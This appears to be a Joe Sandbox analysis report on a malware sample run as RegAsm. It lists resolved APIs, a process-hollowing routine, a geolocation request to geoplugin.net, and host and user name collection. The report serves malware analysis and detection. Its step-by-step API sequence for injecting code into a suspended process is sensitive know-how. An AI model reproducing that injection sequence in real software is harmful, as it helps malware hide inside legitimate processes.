55648->55651 55649->55635 55650 4117d7 SetLastError 55650->55651 55651->55649 55651->55650 55653 411ca5 55652->55653 55654 411bbb IsBadReadPtr 55652->55654 55653->55630 55662 41198a 55653->55662 55654->55653 55658 411bd5 55654->55658 55657 411cbd SetLastError 55657->55653 55658->55653 55658->55657 55659 411ca7 SetLastError 55658->55659 55660 411c8a IsBadReadPtr 55658->55660 55675 440f5d 55658->55675 55659->55653 55660->55653 55660->55658 55666 4119b0 55662->55666 55663 411a99 55664 4118ed VirtualProtect 55663->55664 55665 411aab 55664->55665 55665->55639 55666->55663 55666->55665 55690 4118ed 55666->55690 55669 10002215 55668->55669 55670 1000221a dllmain_dispatch 55668->55670 55694 100022b1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 55669->55694 55670->55640 55672->55625 55673->55628 55674->55619 55676 446206 55675->55676 55677 446213 55676->55677 55678 44621e 55676->55678 55679 4461b8 ___crtLCMapStringA 21 API calls 55677->55679 55680 446226 55678->55680 55686 44622f __Getctype 55678->55686 55684 44621b 55679->55684 55681 446802 _free 20 API calls 55680->55681 55681->55684 55682 446234 55688 44062d 20 API calls _free 55682->55688 55683 446259 HeapReAlloc 55683->55684 55683->55686 55684->55658 55686->55682 55686->55683 55689 443001 7 API calls 2 library calls 55686->55689 55688->55684 55689->55686 55691 4118f6 55690->55691 55693 4118fe 55690->55693 55691->55666 55692 411971 VirtualProtect 55692->55691 55693->55691 55693->55692 55694->55670 55695 42f97e 55696 42f989 55695->55696 55698 42f99d 55696->55698 55699 432f7f 55696->55699 55698->55698 55700 432f8a 55699->55700 55701 432f8e 55699->55701 55700->55698 55702 440f5d 22 API calls 55701->55702 55702->55700 55703 40165e 55704 401666 55703->55704 55705 401669 55703->55705 55706 4016a8 55705->55706 55708 401696 55705->55708 55707 43455e new 22 API calls 55706->55707 55709 40169c 55707->55709 55710 43455e new 22 API calls 55708->55710 55710->55709 55711 426cdc 55716 426d59 send 55711->55716 55717 10001f3f 55718 10001f4b ___DestructExceptionObject 55717->55718 55735 1000247c 55718->55735 55720 10001f52 55721 10002041 55720->55721 55722 10001f7c 55720->55722 55729 10001f57 ___scrt_is_nonwritable_in_current_image 55720->55729 55751 10002639 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 55721->55751 55746 100023de IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 55722->55746 55725 10002048 55726 10001f8b __RTC_Initialize 55726->55729 55747 100022fc RtlInitializeSListHead 55726->55747 55728 10001f99 ___scrt_initialize_default_local_stdio_options 55748 100046c5 5 API calls _ValidateLocalCookies 55728->55748 55731 10001fad 55731->55729 55749 100023b3 IsProcessorFeaturePresent ___isa_available_init ___scrt_release_startup_lock 55731->55749 55733 10001fb8 55733->55729 55750 10004669 5 API calls _ValidateLocalCookies 55733->55750 55736 10002485 55735->55736 55752 10002933 IsProcessorFeaturePresent 55736->55752 55738 10002491 55753 100034ea 55738->55753 55740 10002496 55745 1000249a 55740->55745 55762 100053c8 55740->55762 55743 100024b1 55743->55720 55745->55720 55746->55726 55747->55728 55748->55731 55749->55733 55750->55729 55751->55725 55752->55738 55754 100034ef ___vcrt_initialize_winapi_thunks 55753->55754 55766 10003936 6 API calls 2 library calls 55754->55766 55756 100034f9 55757 100034fd 55756->55757 55767 100038e8 55756->55767 55757->55740 55759 10003505 55760 10003510 55759->55760 55775 10003972 RtlDeleteCriticalSection 55759->55775 55760->55740 55794 10007457 55762->55794 55765 10003529 7 API calls 3 library calls 55765->55745 55766->55756 55776 10003af1 55767->55776 55770 100038fd 55770->55759 55772 1000390b 55773 10003918 55772->55773 55782 1000391b 5 API calls ___vcrt_FlsFree 55772->55782 55773->55759 55775->55757 55783 10003a82 55776->55783 55778 10003b0b 55779 10003b24 TlsAlloc 55778->55779 55780 100038f2 55778->55780 55780->55770 55781 10003ba2 5 API calls try_get_function 55780->55781 55781->55772 55782->55770 55784 10003aaa 55783->55784 55786 10003aa6 __crt_fast_encode_pointer 55783->55786 55784->55786 55787 100039be 55784->55787 55786->55778 55788 100039cd try_get_first_available_module 55787->55788 55789 100039ea LoadLibraryExW 55788->55789 55791 10003a60 FreeLibrary 55788->55791 55792 10003a77 55788->55792 55793 10003a38 LoadLibraryExW 55788->55793 55789->55788 55790 10003a05 GetLastError 55789->55790 55790->55788 55791->55788 55792->55786 55793->55788 55797 10007470 55794->55797 55795 10002ada _ValidateLocalCookies 5 API calls 55796 100024a3 55795->55796 55796->55743 55796->55765 55797->55795 55798 10005bff 55806 10005d5c 55798->55806 55802 10005c1b 55803 10005c28 55802->55803 55814 10005c2b 10 API calls 55802->55814 55805 10005c13 55807 10005c45 _abort 4 API calls 55806->55807 55808 10005d83 55807->55808 55809 10005d9b TlsAlloc 55808->55809 55810 10005d8c 55808->55810 55809->55810 55811 10002ada _ValidateLocalCookies 5 API calls 55810->55811 55812 10005c09 55811->55812 55812->55805 55813 10005b7a 19 API calls 2 library calls 55812->55813 55813->55802 55814->55805

                                                                                Executed Functions

                                                                                Function 0041CBE1 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                                • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                                • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                                • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                                • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                                • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                                • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                                                                                • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                                                                                • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                                                                                • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                • API String ID: 4236061018-3687161714
                                                                                • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                                                • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE
                                                                                Function 0041812A Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 289nativelibraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 448 41812a-418153 449 418157-4181be GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 4181c4-4181cb 449->450 451 4184bb 449->451 450->451 453 4181d1-4181d8 450->453 452 4184bd-4184c7 451->452 453->451 454 4181de-4181e0 453->454 454->451 455 4181e6-418213 call 436f10 * 2 454->455 455->451 460 418219-418224 455->460 460->451 461 41822a-41825a CreateProcessW 460->461 462 418260-418288 VirtualAlloc GetThreadContext 461->462 463 4184b5 GetLastError 461->463 464 41847f-4184b3 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->464 465 41828e-4182ae ReadProcessMemory 462->465 463->451 464->451 465->464 466 4182b4-4182d6 NtCreateSection 465->466 466->464 467 4182dc-4182e9 466->467 468 4182eb-4182f6 NtUnmapViewOfSection 467->468 469 4182fc-41831e NtMapViewOfSection 467->469 468->469 470 418320-41835d VirtualFree NtClose TerminateProcess 469->470 471 418368-41838f GetCurrentProcess NtMapViewOfSection 469->471 470->449 472 418363 470->472 471->464 473 418395-418399 471->473 472->451 474 4183a2-4183c0 call 436990 473->474 475 41839b-41839f 473->475 478 418402-41840b 474->478 479 4183c2-4183d0 474->479 475->474 480 41842b-41842f 478->480 481 41840d-418413 478->481 482 4183d2-4183f5 call 436990 479->482 484 418431-41844e WriteProcessMemory 480->484 485 418454-41846b SetThreadContext 480->485 481->480 483 418415-418428 call 41853e 481->483 491 4183f7-4183fe 482->491 483->480 484->464 489 418450 484->489 485->464 490 41846d-418479 ResumeThread 485->490 489->485 490->464 493 41847b-41847d 490->493 491->478 493->452
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                                                • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
                                                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                                                • NtClose.NTDLL(?), ref: 00418332
                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                                • NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                                                • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                                • ResumeThread.KERNEL32(?), ref: 00418470
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                                • NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
                                                                                • NtClose.NTDLL(?), ref: 004184A3
                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                                • GetLastError.KERNEL32 ref: 004184B5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
                                                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                • API String ID: 316982871-3035715614
                                                                                • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                                                • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                                                                Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1580 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1587 10001177-1000119e lstrlenW FindFirstFileW 1580->1587 1588 10001168-10001172 lstrlenW 1580->1588 1589 100011a0-100011a8 1587->1589 1590 100011e1-100011e9 1587->1590 1588->1587 1591 100011c7-100011d8 FindNextFileW 1589->1591 1592 100011aa-100011c4 call 10001000 1589->1592 1591->1589 1594 100011da-100011db FindClose 1591->1594 1592->1591 1594->1590
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                • String ID:
                                                                                • API String ID: 1083526818-0
                                                                                • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                                Function 0040F7E2 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                  • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                  • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                                                • ExitProcess.KERNEL32 ref: 0040F905
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                • String ID: 5.1.1 Pro$override$pth_unenc$34
                                                                                • API String ID: 2281282204-382138516
                                                                                • Opcode ID: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                                • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                                                • Opcode Fuzzy Hash: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                                • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                                                Function 0041B411 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1643 41b411-41b454 call 4020df call 43bda0 InternetOpenW InternetOpenUrlW 1648 41b456-41b477 InternetReadFile 1643->1648 1649 41b479-41b499 call 4020b7 call 403376 call 401fd8 1648->1649 1650 41b49d-41b4a0 1648->1650 1649->1650 1652 41b4a2-41b4a4 1650->1652 1653 41b4a6-41b4b3 InternetCloseHandle * 2 call 43bd9b 1650->1653 1652->1648 1652->1653 1657 41b4b8-41b4c2 1653->1657
                                                                                APIs
                                                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                                Strings
                                                                                • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                                • String ID: http://geoplugin.net/json.gp
                                                                                • API String ID: 3121278467-91888290
                                                                                • Opcode ID: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                                • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                                                • Opcode Fuzzy Hash: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                                • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                                                Function 00411D39 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                                • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                                                                                • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                                                  • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                                                  • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                  • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                • String ID:
                                                                                • API String ID: 3950776272-0
                                                                                • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                                • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                                                Function 0041B69E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetComputerNameExW.KERNEL32(00000001,?,0000002B,p54), ref: 0041B6BB
                                                                                • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Name$ComputerUser
                                                                                • String ID: p54
                                                                                • API String ID: 4229901323-674596673
                                                                                • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                                                • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                                                Function 004338C8 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,00349B10), ref: 004338DA
                                                                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
